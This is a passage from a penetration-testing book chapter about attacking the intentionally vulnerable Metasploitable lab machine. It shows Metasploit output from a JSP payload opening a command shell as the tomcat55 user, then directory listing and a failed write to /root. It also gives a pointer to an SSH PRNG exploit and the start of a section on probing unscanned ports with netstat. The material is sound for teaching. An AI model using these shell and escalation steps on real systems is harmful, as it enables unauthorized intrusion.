262

Chapter 17

[*] Executing /FW36owipzcnHeUyIUaX/UGMIdfFjVENQOp4VveswTlma.jsp...
[*] Undeploying FW36owipzcnHeUyIUaX ...
[*] Command shell session 1 opened (172.16.32.129:43474 -> 172.16.32.162:9999) at 2010-05-
21 23:57:47 -0400msf 

ls

bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

whoami

tomcat55

ls /root

reset_logs.sh

mkdir /root/moo.txt

mkdir: cannot create directory '/root/moo.txt': Permission denied

Notice that we cannot write to the root folder, because we’re running 

from a limited user account and this folder requires root-level permissions. 
Usually, Apache runs under the Apache user account, which is sometimes 

apache

 but which can also be 

httpd

, 

www-data

, among other names. Based on 

what we know about the operating system version in use on the target, we 
could use local privilege escalation techniques to gain further access as root. 
Because we already have some basic access, let’s try a couple of different attacks.

NOTE

Here’s a little hint in obtaining root access to Metasploitable, without privilege escalation: 
Check out 

http://www.exploit-db.com/exploits/5720/

 for the SSH predictable 

PRNG exploit.

Attacking Obscure Services

When we performed only the default 

nmap

 port scan, we did not include all 

possible ports. Because we have now gained initial access to the system, we 
enter 

netstat -antp

, and we notice other ports that 

nmap

 did not scan for